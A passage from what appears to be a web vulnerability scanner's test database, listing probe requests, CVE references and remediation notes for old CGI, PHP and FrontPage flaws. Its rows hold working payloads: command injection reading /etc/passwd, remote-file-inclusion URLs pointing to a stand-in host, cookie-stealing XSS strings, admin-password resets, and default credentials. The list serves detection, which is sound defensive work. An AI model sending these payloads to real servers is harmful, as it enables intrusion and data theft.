attackers to execute commands.","","" "001045","","8","@CGIDIRSinfosrch.cgi","GET","200","","","","","This CGI allows attackers to execute commands.","","" "001046","","8","@CGIDIRSlistrec.pl","GET","200","","","","","This CGI allows attackers to execute commands on the host.","","" "001047","","8","@CGIDIRSmailnews.cgi","GET","200","","","","","Some versions allow attacker to execute commands as http daemon. Upgrade or remove.","","" "001048","","8","@CGIDIRSmmstdod.cgi","GET","200","","","","","May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.","","" "001049","","8","@CGIDIRSpagelog.cgi","GET","200","","","","","Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.","","" "001050","","8","@CGIDIRSperl?-v","GET","200","","","","","Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.","","" "001051","","8","@CGIDIRSperl.exe?-v","GET","200","","","","","Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.","","" "001052","","8","@CGIDIRSperl.exe","GET","200","","","","","Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.","","" "001053","","8","@CGIDIRSperl","GET","200","","","","","Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.","","" "001054","","8","@CGIDIRSplusmail","GET","200","","","","","This CGI may allow attackers to execute commands remotely.","","" "001055","CVE-2004-1607 http://www.securityfocus.com/archive/1/378637","8","@CGIDIRSscripts/slxweb.dll/getfile?type=Library&file=invalidfilename","GET","200","","","","","SalesLogix WebClient may allow attackers to execute arbitrary commands on the host.","","" "001056","","8","@CGIDIRSsmartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|","GET","200","root:","","","","To check for remote execution vulnerability use ?keywords=|/bin/ls| or your favorite command","","" "001057","","8","@CGIDIRSsmartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|","GET","root:","","","","","To check for remote execution vulnerability use ?keywords=|/bin/ls| or your favorite command","","" "001058","https://www.tenable.com/plugins/nessus/10393","8","@CGIDIRSspin_client.cgi?aaaaaaaa","GET","200","","","","","This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)","","" "001059","CVE-2002-0436","8","@CGIDIRSsscd_suncourier.pl","GET","200","","","","","Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.","","" "001060","CVE-2001-0849","8","@CGIDIRSviralator.cgi","GET","200","","","","","May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.","","" "001061","CVE-2002-1938","8","@CGIDIRSvirgil.cgi","GET","200","","","","","The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax such as virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.","","" "001062","https://seclists.org/bugtraq/2002/Oct/362","8","@CGIDIRSvpasswd.cgi","GET","200","","","","","Some versions of this CGI allow attackers to execute system commands.","","" "001063","CVE-1999-0176","8","@CGIDIRSwebgais","GET","200","","","","","The webgais allows attackers to execute commands.","","" "001064","CVE-1999-0196","8","@CGIDIRSwebsendmail","GET","200","","","","","This CGI may allow attackers to execute arbitrary commands remotely.","","" "001065","","8","@CGIDIRSwhois.cgi?action=load&whois=%3Bid","GET","uid=","","","","","This script allows commands to be executed remotely.","","" "001066","","8","@CGIDIRSwwwwais","GET","200","","","","","wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.","","" "001067","CVE-2002-0436","8","/cd-cgi/sscd_suncourier.pl","GET","200","","","","","Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.","","" "001068","","8","@CGIDIRScommon/listrec.pl","GET","200","","","","","This CGI allows attackers to execute commands on the host.","","" "001069","","8","/cgi-bin/handler","GET","200","","","","","This program allows remote users to run arbitrary commands.","","" "001070","","8","/cgi-bin/handler/netsonar;cat%20/etc/passwd|?data=Download","GET","root:","","","","","This program allows remote users to run arbitrary commands.","","" "001071","CVE-1999-0039","8","/cgi-bin/webdist.cgi","GET","200","","","","","This program allows remote users to run arbitrary commands.","","" "001072","CVE-2002-1484","8","/DB4Web/10.10.10.10:100","GET","connect\(\)","","","","","The remote DB4Web server may allow you to connect to arbitrary machines and ports.","","" "001073","CVE-1999-0279","8","/ews/ews/architext_query.pl","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. BID-2665.","","" "001074","","8","/exec/show/config/cr","GET","http>Configure","","","","","The Cisco router's web install allows arbitrary commands to be executed remotely.","","" "001075","CVE-2002-0490","8","/instantwebmail/message.php","GET","200","","","","","Instant Web Mail is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email.","","" "001076","","38","/cfdocs/snippets/gettempdirectory.cfm","GET","200","","not found","","","Depending on install, creates files, gives you physical drive info, sometimes defaults to \winnt\ directory as temp directory","","" "001077","CVE-2002-2330,http://www.uninetsolutions.com/stats.html","48","@CGIDIRSstat.pl","GET","200","","","","","Uninets StatsPlus 1.25 may be vulnerable to command/script injection by manipulating HTTP_USER_AGENT or HTTP_REFERER.","","" "001078","CVE-1999-0710","a","@CGIDIRScachemgr.cgi","GET","200","","","","","Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.","","" "001079","BID-491","a","@CGIDIRSppdscgi.exe","GET","200","","","","","PowerPlay Web Edition may allow unauthenticated users to view pages.","","" "001080","","ae","@CGIDIRSsws/admin.html","GET","manager\.pl","","","","","Stepweb.com SWS search engine admin page is available. You may be able to change admin information without authentication.","","" "001081","","ae","@CGIDIRSwebif.cgi","GET","200","","","","","HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.","","" "001082","CVE-2006-5412","ae","/admin.php?en_log_id=0&action=config","GET","200","","","","","EasyNews version 4.3 allows remote admin access. This PHP file should be protected.","","" "001083","CVE-2006-5412","ae","/admin.php?en_log_id=0&action=users","GET","200","","","","","EasyNews version 4.3 allows remote admin access. This PHP file should be protected.","","" "001084","","ae","/admin.php4?reg_login=1","GET","200","","","","","Mon Album version 0.6.2d allows remote admin access. This should be protected.","","" "001085","","ae","/admin/admin_phpinfo.php4","GET","200","","","","","Mon Album version 0.6.2d allows remote admin access. This should be protected.","","" "001086","CVE-2002-0995","a","/admin/login.php?action=insert&username=test&password=test","GET","200","","","","","phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.","","" "001087","","a","@CGIDIRS.cobalt/siteUserMod/siteUserMod.cgi","GET","200","","","","","Older versions of this CGI allow any user to change the administrator password.","","" "001088","CVE-2001-0432","a","/interscan/cgi-bin/FtpSave.dll?I'm%20Here","GET","These settings have been saved","","","","","Multiple files in the Interscan management server allow attackers to change settings without auth. Upgrade to the latest version of the Interscan product.","","" "001089","CVE-2002-1021","7a","/ext.ini.%00.txt","GET","\[SERVICES\]","","","","","BadBlue allows access restrictions to be bypassed by using a null byte.","","" "001090","","8a","@CGIDIRSwebdriver","GET","200","","","","","This CGI often allows anyone to access the Informix DB on the host.","","" "001091","CVE-2002-0599,https://sourceforge.net/projects/blahzdns/","8a","/dostuff.php?action=modify_user","GET","200","","","","","Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher.","","" "001092","","ab","@CGIDIRSc32web.exe/ChangeAdminPassword","GET","200","","","","","This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.","","" "001093","CVE-2002-0776","ab","/accounts/getuserdesc.asp","GET","200","","","","","Hosting Controller 2002 administration page is available. This should be protected.","","" "001094","","b","@CGIDIRScgi-lib.pl","GET","200","","","","","CGI Library. If retrieved check to see if it is outdated, it may have vulns","","" "001095","","b","@CGIDIRSlog/nether-log.pl?checkit","GET","200","","","","","Default Pass: nethernet-rules","","" "001096","","b","@CGIDIRSmini_logger.cgi","GET","200","","","","","Default password: guest","","" "001097","","b","@CGIDIRSmt-static/","GET","200","","","","","Movable Type weblog found. May contain security problems in CGIs, weak passwords, and more. Default login 'Melody' with password 'Nelson'.","","" "001098","","b","@CGIDIRSmt/","GET","200","","","","","Movable Type weblog found. May contain security problems in CGIs, weak passwords, and more. Default login 'Melody' with password 'Nelson'.","","" "001099","","b","@CGIDIRSnimages.php","GET","200","","","","","Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.","","" "001100","","b","@CGIDIRSrobadmin.cgi","GET","200","","","","","Default password: roblog","","" "001101","","b","/Admin/","GET","CobaltServer","","","","","The web server is the CobaltRaq administrator. If password protection is broken, attackers will have access to admin your server. Use tcpwrappers or shut this down for safety.","","" "001102","","0b","@CGIDIRSnetpad.cgi","GET","200","","","","","netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.","","" "001103","","1b","@CGIDIRStroops.cgi","GET","200","","","","","This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites. It should be investigated further.","","" "001104","","1b","@CGIDIRSunlg1.1","GET","200","","","","","web backdoor by ULG","","" "001105","","1b","@CGIDIRSunlg1.2","GET","200","","","","","web backdoor by ULG","","" "001106","","8b","@CGIDIRSrwwwshell.pl","GET","200","","","","","THC reverse www shell","","" "001107","","ab","@CGIDIRSphoto/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more.","","" "001109","CVE-2002-1435","c","/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL","GET","PHP Version","","","","","Achievo can be made to include PHP files from another domain. Upgrade to a new version.","","" "001110","OSVDB-35876","9","/agentadmin.php","GET","200","","","","","Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.","","" "001111","OSVDB-50530","c","/b2-include/b2edit.showposts.php?b2inc=@RFIURL&cmd=ls","GET","PHP Version","","","","","B2 (cafelog.com) are vulnerable to remote inclusion by redefining $b2inc to a remote PHP file. Upgrade to a version higher than b2.06pre2. This vulnerability could not be confirmed.","","" "001113","OSVDB-35388","c","/errors/needinit.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Gallery 1.3.0 and below allow PHP files to be included from another domain. Upgrade to the latest version.","","" "001114","","13","/sqldump.sql","GET","200","","","","","Database SQL?","","" "001115","","13","/structure.sql","GET","200","","","","","Database SQL?","","" "001116","","2","/servlet/SessionManager","GET","200","Error Occurred","","","","IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.","","" "001117","","23","/php.ini","GET","\[PHP\]","","","","","This file should not be available through the web interface.","","" "001118","","2a","/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator","GET","Event Log","","","","","SiteScope service has no password set. Restrict by IP and set a password.","","" "001119","","3","/ip.txt","GET","200","","","","","This may be User Online version 2.0, which has a remotely accessible log file.","","" "001120","OSVDB-15301","3","/JUNK(6).cfm?mode=debug","GET","Execution Time","","","","","ColdFusion debug information contains sensitive information and can be viewed by appending ?Mode=debug at the end of the request.","","" "001121","","3","/level/42/exec/show%20conf","GET","200","","","","","Retrieved Cisco configuration file.","","" "001122","","3","/livehelp/","GET","200","","","","","LiveHelp may reveal system information.","","" "001123","","3","/LiveHelp/","GET","200","","","","","LiveHelp may reveal system information.","","" "001124","OSVDB-59536","3","/logicworks.ini","GET","200","","","","","web-erp 0.1.4 and earlier allow .ini files to be read remotely.","","" "001125","","3","/login.jsp","GET","replace\(\"https:\\\/\\\/10","","","","","HP Insight Manager reveals internal IP addresses in the HTML page.","","" "001126","","3","/logins.html","GET","Below are the usernames and passwords","","","","","The Divine/OpenMarket Content Server lists the default user names and passwords set up with the server.","","" "001127","","3","/logs/str_err.log","GET","200","","","","","Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries).","","" "001128","CVE-1999-0606","3","/mall_log_files/order.log","GET","200","","","","","EZMall2000 exposes order information.","","" "001129","https://www.php.net/manual/en/function.phpinfo.php","3","/mambo/administrator/phpinfo.php","GET","PHP Version","","","","","Mambo Site Server 4.0.11 phpinfo.php script reveals system information.","","" "001130","OSVDB-3204","3","/megabook/files/20/setup.db","GET","200","","","","","Megabook guestbook configuration available remotely.","","" "001132","","3","/modules.php?name=Members_List&sql_debug=1","GET","SQL query:","","","","","The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.","","" "001133","","3","/myinvoicer/config.inc","GET","System settings","","","","","MyInvoicer prior to 1.0.2 allowed remote user to read source of config file, possibly leaking sensitive information or passwords.","","" "001134","CVE-2001-1151","3","/officescan/hotdownload/ofscan.ini","GET","200","","","","","OfficeScan from Trend Micro allows anyone to read the ofscan.ini file, which may contain passwords.","","" "001136","CVE-1999-0606","3","/order/order_log.dat","GET","200","","","","","Web shopping system exposes order information.","","" "001137","CVE-1999-0606","3","/orders/order_log_v12.dat","GET","200","","","","","Web shopping system exposes order information.","","" "001141","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/PDG_Cart/shopper.conf","GET","Authnet_Login","","","","","PDGSoft's PDG Shopping Cart 1.5 config is available.","","" "001142","CVE-2002-0352","3","/phorum/admin/stats.php","GET","Phorum Stats","","","","","PHP based forum script Phorum allows a user to retrieve the top ten active users, including email addresses. Delete the script or pass protect it.","","" "001143","OSVDB-2809","3","/php-coolfile/action.php?action=edit&file=config.php","GET","pass_1","","","","","PHP-Coolfile 1.4 may allow any user to read the config.php file.","","" "001144","https://www.php.net/manual/en/function.phpinfo.php","3","/phpBB/phpinfo.php","GET","PHP Version","","","","","phpBBmod contains an enhanced version of the phpinfo.php script. This should be removed as it contains detailed system information.","","" "001147","https://seclists.org/bugtraq/2002/Dec/129","3","/pmlite.php","GET","200","","","","","A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested).","","" "001148","","3","/session/admnlogin","GET","200","Error Occurred","","","","SessionServlet Output, has session cookie info.","","" "001149","OSVDB-6560","3","/settings/site.ini","GET","DatabaseSettings","","","","","eZ publish v3 and prior allow site setup code to be viewed remotely.","","" "001150","OSVDB-613","3","/SiteScope/htdocs/SiteScope.html","GET","200","","","","","The SiteScope install may allow remote users to get sensitive information about the hosts being monitored.","","" "001151","","3","/soapdocs/ReleaseNotes.html","GET","Oracle SOAP","","","","","Default Oracle SOAP documentation found.","","" "001152","","3","/ssdefs/siteseed.dtd","GET","imagesDir=\"","","","","","Siteseed pre 1.4.2 has 'major' security problems, and this dtd file reveals the web root.","","" "001153","CVE-2001-0926","35","/servlet/allaire.jrun.ssi.SSIFilter","GET","200","Error Occurred","","","","Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->","" "001154","OSVDB-2881","3a","/pp.php?action=login","GET","200","","","","","Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.","","" "001155","","6","/isapi/count.pl?","GET","200","","","","","AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.","","" "001156","","7","/krysalis/","GET","200","","","","","Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot","","" "001157","","8","/logjam/showhits.php","GET","200","","","","","Logjam may possibly allow remote command execution via showhits.php page.","","" "001158","","8","/manual.php","GET","200","","","","","Does not filter input before passing to shell command. Try 'ls -l' as the man page entry.","","" "001159","CVE-2005-1628","8","/mods/apage/apage.cgi?f=file.htm.|id|","GET","uid=0","","","","","WebAPP Apage.CGI remote command execution. BID-13637","","" "001160","","8","/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","","" "001161","","8","/nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","","" "001162","","8","/perl/-e%20%22system('cat%20/etc/passwd');\%22","GET","root:","","","","","The installed Perl interpreter allows any command to be executed remotely.","","" "001163","","8","/phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","","" "001164","","8","/phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","","" "001165","CVE-2005-0595","8","/Program%20Files/","GET","WindowsUpdate","","","","","This check (B) uses the BadBlue test (A) for possible exploit.","","" "001166","CVE-2002-0220","8","/smssend.php","GET","200","","","","","PhpSmssend may allow system calls if a ' is passed to it.","","" "001167","","8a","/pls/simpledad/admin_/dadentries.htm","GET","Add Database Access","","","","","Oracle admin script allows modification of database information.","","" "001168","","a","/Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000","POST","Login as Admin successful","","","","","Meridian Integrated Recorded Announcer default account admin/admin000 enabled","","" "001169","CVE-1999-1508","a","/ncl_items.html","GET","200","","","","","This may allow attackers to reconfigure your Tektronix printer.","","" "001170","CVE-2001-0484","a","/ncl_items.shtml?SUBJECT=1","GET","200","","","","","This may allow attackers to reconfigure your Tektronix printer.","","" "001171","","a","/photo/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more.","","" "001172","","a","/photodata/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more.","","" "001174","CVE-2002-0095","a","/pub/english.cgi?op=rmail","GET","200","","","","","BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely.","","" "001175","","a","/pvote/ch_info.php?newpass=password&confirm=password%20","GET","200","","","","","PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.","","" "001176","CVE-2000-0127","a","/scripts/wsisa.dll/WService=anything?WSMadmin","GET","200","","","","","Allows Webspeed to be remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0.","","" "001177","","a","/SetSecurity.shm","GET","200","","","","","Cisco System's My Access for Wireless. This resource should be password protected.","","" "001178","OSVDB-3126","a","/submit?setoption=q&option=allowed_ips&value=255.255.255.255","GET","200","","","","","MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.","","" "001179","OSVDB-2225","a","/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin","GET","200","","","","","paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.","","" "001180","CVE-1999-0508","ab","/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&","GET","server\.javawebserver\.serviceAdmin","","","","","The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed.","","" "001181","","b","/shopadmin.asp","GET","200","","","","","VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.","","" "001182","CVE-2002-1135","c","/modsecurity.php?inc_prefix=@RFIURL","GET","PHP Version","","","","","This phpWebSite script may allow inclusion of remote scripts by adding ?inc_prefix=http://YOURHOST/","","" "001183","CVE-2002-0473","c","/phpBB2/includes/db.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Some versions of db.php from phpBB2 allow remote file inclusions. Verify the current version is running.","","" "001184","CVE-2002-0681","4","/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS).","","" "001185","CVE-2000-0413","3","/_vti_bin/shtml.exe/junk_nonexistant.exe","GET",":\\\\","","","Unknown CONTENT_TYPE","","This exe shows the full web path when a non-existent file is requested.","","" "001186","","1b","/_vti_txt/_vti_cnf/","GET","200","","","","","FrontPage directory found.","","" "001187","","1b","/_vti_txt/","GET","200","","","","","FrontPage directory found.","","" "001188","","23","/_vti_pvt/deptodoc.btr","GET","200","","","","","FrontPage file found. This may contain useful information.","","" "001189","","23","/_vti_pvt/doctodep.btr","GET","200","","","","","FrontPage file found. This may contain useful information.","","" "001190","","23","/_vti_pvt/services.org","GET","200","","","","","FrontPage file found. This may contain useful information.","","" "001191","CVE-2000-0413,CVE-2000-0709,CVE-2000-0710","3","/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611","POST","200","","","FrontPage Error","","Gives info about server settings.","","X-Vermeer-Content-Type: application/x-www-form-urlencoded" "001192","CVE-2000-0413,CVE-2000-0709,CVE-2000-0710","3","/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611","POST","200","","","Unknown CONTENT_TYPE","","Gives info about server settings.","","X-Vermeer-Content-Type: application/x-www-form-urlencoded" "001193","","a","/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false","POST","200","","","specified module could not be found","","We seem to have authoring access to the FrontPage web.","","X-Vermeer-Content-Type: application/x-www-form-urlencoded" "001194","","a","/_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false","POST","200","","","specified module could not be found","","We seem to have authoring access to the FrontPage web.","","X-Vermeer-Content-Type: application/x-www-form-urlencoded" "001195","MS00-025","ad","/_vti_bin/_vti_aut/dvwssr.dll","GET","200","","","","","This dll allows anyone with authoring privs to change other users file, and may contain a buffer overflow for unauthenticated users.","","" "001196","","d","/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx","GET","The remote procedure call failed","","","","","This dll is vulnerable to a remote overflow that can allow attackers to execute remote commands.","","" "001197","MS03-051","d","/_vti_bin/_vti_aut/fp30reg.dll","GET","200","","","","","Some versions of the FrontPage fp30reg.dll are vulnerable to a buffer overflow.","","" "001198","CVE-2002-1717","23","/_vti_pvt/access.cnf","GET","200","","","","","Contains HTTP server-specific access control information. Remove or ACL if FrontPage is not being used.","","" "001199","CVE-2002-1717","23","/_vti_pvt/botinfs.cnf","GET","vti_encoding","","","","","FrontPage file found. This may contain useful information.","","" "001200","CVE-2002-1717","23","/_vti_pvt/bots.cnf","GET","vti_encoding","","","","","FrontPage file found. This may contain useful information.","","" "001201","CVE-2002-1717","23","/_vti_pvt/service.cnf","GET","200","","","","","Contains meta-information about the web server Remove or ACL if FrontPage is not being used.","","" "001202","CVE-2002-1717","23","/_vti_pvt/services.cnf","GET","200","","","","","Contains the list of subwebs. Remove or ACL if FrontPage is not being used. May reveal server version if Admin has changed it.","","" "001203","CVE-2002-1717","23","/_vti_pvt/svacl.cnf","GET","200","","","","","File used to store whether subwebs have unique permissions settings and any IP address restrictions. Can be used to discover information about subwebs, remove or ACL if FrontPage is not being used.","","" "001204","CVE-2002-1717","23","/_vti_pvt/writeto.cnf","GET","200","","","","","Contains information about form handler result files. Remove or ACL if FrontPage is not being used.","","" "001205","CVE-2002-1717","3","/_vti_pvt/linkinfo.cnf","GET","200","","","","","IIS file shows http links on and off site. Might show host trust relationships and other machines on network.","","" "001206","CWE-552","b","@TOMCATADMIN","GET","Tomcat's administration web application","","","","","Tomcat is installed, however the administration package does not appear to be.","","" "001207","","b","/isx.html","GET","InfraStruXure Manager","","","","","APC InfraStruXure Manager management page found. Content may reveal software version.","","" "001208","CVE-2001-0748","7","///","GET","Acme\.Serve v1\.7","","","","","Acme.Serve allows arbitrary file retrieval","","" "001209","CWE-552","3","@CGIDIRSblog/mt-check.cgi","GET","Current working directory","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","","" "001210","CVE-2002-0855","4","/mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Mailman is vulnerable to Cross Site Scripting (XSS).","","" "001211","OSVDB-16207","4","/mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS).","","" "001212","CWE-552","b","/mailman/listinfo","GET","mailing list","","","","","Mailman was found on the server.","","" "001213","CVE-1999-0678","3","/doc/","GET","200","","","","","The /doc/ directory is browsable. This may be /usr/doc.","","" "001214","CVE-1999-0678","3","/doc","GET","200","","","","","The /doc directory is browsable. This may be /usr/doc.","","" "001215","CVE-2001-0835","4","/webalizer/","GET","Generated by The Webalizer","","","","","Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).","","" "001216","CVE-2001-0835","4","/web/","GET","Generated by The Webalizer","","","","","Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).","","" "001217","CVE-2001-0835","4","/usage/","GET","Generated by (The )?Webalizer","","","","","Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).","","" "001218","","3","/sitemap.xml","GET","200","","<urlset","","","This gives a nice listing of the site content.","","" "001220","CVE-2005-2413","c","/photo_album/apa_phpinclude.inc.php?apa_module_basedir=@RFIURL","GET","PHP Version","","","","","Atomic Photo Album could allow remote source inclusion.","","" "001221","BID-1795 CVE-1999-0930","a","/cgis/wwwboard/wwwboard.cgi","GET","200","","","","","Versions 2.0 Alpha and below have multiple problems. This could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.","","" "001222","BID-1795 CVE-1999-0930","a","/cgis/wwwboard/wwwboard.pl","GET","200","","","","","Versions 2.0 Alpha and below have multiple problems. This could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.","","" "001223","CVE-2006-2397","4","/affich.php?image=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GPhotos index.php rep Variable XSS.","","" "001224","CVE-2006-2397","4","/diapo.php?rep=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GPhotos index.php rep Variable XSS.","","" "001225","CVE-2006-2397","4","/index.php?rep=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GPhotos index.php rep Variable XSS.","","" "001226","CVE-2000-0672","7","@TOMCATADMINcontextAdmin/contextAdmin.html","GET","200","","","","","Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.","","" "001227","OSVDB-700","4","/fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS).","","" "001228","OSVDB-3954","4","/fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS).","","" "001229","OSVDB-700","4","/fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS).","","" "001230","OSVDB-3954","4","/fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS).","","" "001231","CVE-2001-0500","3","/blahb.ida","GET","200","","","file blahb\.ida could not","","Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. MS01-033.","","" "001232","CVE-2001-0500","3","/blahb.idq","GET","200","","","file blahb\.idq could not","","Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. MS01-033.","","" "001233","OSVDB-19957","a","/ab2/\@AdminViewError","GET","200","","","","","Sun Answerbook allows viewing of the error logs without authentication.","","" "001236","CVE-2002-1167","4","/\"><img%20src=\"javascript:alert(document.domain)\">","GET","<img src=\"javascript:alert\(document\.domain\)\">","","","","","The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS).","","" "001237","CWE-552","3","/Survey/Survey.Htm","GET","System Components","","","","","This Compaq device, without authentication, gives lots of system information.","","" "001238","CWE-552","3","/WEBAGENT/CQMGSERV/CF-SINFO.TPF","GET","General Information","","","","","This Compaq device, without authentication, gives lots of system information. Load all the pages at /WEBAGENT/FINDEX.TPL","","" "001239","CVE-2000-0696","a","/ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar","GET","200","","","","","Sun Answerbook may allow users to be created without proper authentication first. Attempted to add user 'foo' with password 'bar'.","","" 